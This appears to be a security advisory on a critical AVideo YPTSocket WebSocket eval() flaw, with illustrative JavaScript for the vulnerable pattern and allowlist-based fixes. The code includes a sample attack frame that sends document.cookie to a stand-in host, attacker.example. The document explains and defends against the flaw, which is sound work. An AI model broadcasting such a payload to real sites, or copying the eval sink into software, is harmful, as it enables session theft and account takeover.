AVideo, a self-hosted video streaming platform popular with content creators and businesses for hosting and monetizing content, has a critical vulnerability in its YPTSocket plugin that allows an unauthenticated attacker to hijack every active session on the platform at once.
The flaw carries a CVSS score of 10.0, the highest possible severity rating, reflecting both trivial exploitability and a devastating impact on affected instances.
The vulnerability stems from the way the YPTSocket plugin handles WebSocket communications. The server acts as a relay, taking JSON message bodies from one client and broadcasting them to all other connected clients without any sanitization or validation of the content.
The bug lies in the client-side JavaScript (plugin/YPTSocket/script.js), which contains two dangerous eval() sinks. These sinks take fields from the relayed messages—specifically json.msg.autoEvalCodeOnHTML and json.callback—and execute them directly as code in the victim’s browser.
Because AVideo issues WebSocket authentication tokens to anonymous visitors, and those tokens are never revalidated beyond their initial decryption, an attacker needs nothing more than a single WebSocket frame to launch a site-wide attack.
When an attacker broadcasts a malicious payload, it executes in the security context (origin) of every currently connected user. This “trust boundary” crossing allows for:
- Universal Account Takeover: Attackers can steal active session data from all users, including administrators.
- Remote Code Execution (RCE): By hijacking an admin session, attackers can perform privileged actions such as installing malicious plugins, which can lead to full server compromise.
- Financial Hijacking: Attackers can rewrite the site’s interface to redirect payments or crypto-donations to their own addresses.
- Persistent Malware: Malicious JavaScript can be stored in localStorage or IndexedDB, ensuring the attack continues even after the user refreshes the page.
As of the latest reports, no patched release is available; the vulnerability affects all versions 29.0 and below. Administrators are urged to apply manual code fixes that implement the following defense-in-depth layers:
| Defense Layer | Recommended Action |
|---|---|
| Client-side | Remove the eval() sinks from script.js entirely. Replace the callback dispatch logic with a strict, name-based lookup against a predefined allowlist of functions. |
| Server-side | Allowlist the message keys that Message.php will forward so that arbitrary JSON fields are never relayed. Validate every callback string against a strict regular expression (for example, a bare identifier) before relaying it. |
| Access control | Require authentication before issuing WebSocket tokens, and allow only administrative users to trigger the system-wide "msgToAll" broadcast. |
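The following is an added illustration of the relay-and-eval pattern described above and of the client-side and server-side mitigations in the table. It is not code from AVideo's script.js or Message.php; the handler names, the `filterForRelay`, `dispatchUnsafe` and `dispatchSafe` functions, the allowed key lists and the sample frames are all assumptions constructed for this example. The server-side filter is modelled in JavaScript here so the whole flow runs in one place.

```javascript
// Added example, not AVideo's own code. Models a relay that forwards JSON between
// clients and a browser-side dispatcher that used to eval() two relayed fields.

// Constructed payload of the kind an attacker could broadcast through the relay.
const maliciousFrame = {
  callback: "fetch('https://attacker.example/?c=' + document.cookie)",
  msg: { autoEvalCodeOnHTML: "document.body.innerHTML = '<h1>pwned</h1>'" },
};

// Constructed benign payload: the callback is named by identifier, not by code.
const benignFrame = { callback: "onViewerCount", msg: { count: "42" } };

// Vulnerable client pattern: relayed strings go straight into eval().
// evalFn is injectable so the sink can be demonstrated without executing anything.
function dispatchUnsafe(json, evalFn = eval) {
  const ran = [];
  if (json.msg && json.msg.autoEvalCodeOnHTML) {
    ran.push(json.msg.autoEvalCodeOnHTML);
    evalFn(json.msg.autoEvalCodeOnHTML);
  }
  if (json.callback) {
    ran.push(json.callback);
    evalFn(json.callback);
  }
  return ran; // every string in here was executed in the page origin
}

// Hardened client: the callback field is only ever a key into a fixed table
// of functions (hypothetical handlers a chat/stream client might expose).
const handlers = Object.freeze({
  onNewMessage: (msg) => `message from ${String(msg.from)}`,
  onViewerCount: (msg) => `viewers: ${Number(msg.count)}`,
});

function dispatchSafe(json) {
  const name = typeof json.callback === "string" ? json.callback : "";
  // hasOwnProperty rejects "constructor", "__proto__" and other inherited names.
  if (!Object.prototype.hasOwnProperty.call(handlers, name)) {
    return { ok: false, reason: `unknown callback ${JSON.stringify(name)}` };
  }
  return { ok: true, result: handlers[name](json.msg || {}) };
}

// Hardened relay (the server-side step, modelled in JS here): copy only
// allowlisted keys, never forward autoEvalCodeOnHTML, and drop any frame whose
// callback is not a bare identifier. Returns null when the frame is rejected.
const ALLOWED_KEYS = ["callback", "msg"];
const ALLOWED_MSG_KEYS = ["from", "count", "text"];
const IDENT = /^[A-Za-z_][A-Za-z0-9_]{0,63}$/;

function filterForRelay(json) {
  if (!json || typeof json !== "object") return null;
  const out = {};
  for (const k of ALLOWED_KEYS) {
    if (!Object.prototype.hasOwnProperty.call(json, k)) continue;
    if (k === "msg") {
      if (!json.msg || typeof json.msg !== "object") continue;
      out.msg = {};
      for (const mk of ALLOWED_MSG_KEYS) {
        if (Object.prototype.hasOwnProperty.call(json.msg, mk)) {
          out.msg[mk] = String(json.msg[mk]); // coerce to plain text, never code
        }
      }
    } else if (k === "callback") {
      if (typeof json.callback !== "string" || !IDENT.test(json.callback)) return null;
      out.callback = json.callback;
    }
  }
  return out;
}
```

Run against the constructed frames, `dispatchUnsafe` shows that both attacker-controlled strings reach the sink, `dispatchSafe` refuses the same frame because the callback is not an allowlisted name, and `filterForRelay` drops it before it is ever broadcast. Note that the client-side allowlist alone is sufficient to close the eval sinks; the server-side filter is the second layer so that a stale or unpatched client receiving relayed frames is not the only thing standing between the attacker and every other browser.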